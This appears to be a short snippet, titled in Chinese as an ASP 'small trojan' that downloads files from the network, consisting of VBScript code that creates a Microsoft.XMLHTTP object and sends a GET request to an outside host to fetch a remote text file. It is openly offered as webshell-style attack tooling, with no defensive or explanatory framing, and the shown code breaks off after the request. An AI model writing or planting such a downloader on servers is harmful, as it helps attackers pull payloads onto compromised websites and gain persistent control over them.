asp版从网络下载文件的小马、 Set xPost=CreateObject("Microsoft.XMLHTTP") xPost.Open"GET","http://mastiff.gbs.me/3.txt",False xPost.Send()